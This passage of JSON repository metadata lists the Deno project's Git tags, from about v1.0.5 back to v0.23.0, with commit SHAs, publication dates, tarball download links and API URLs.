.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":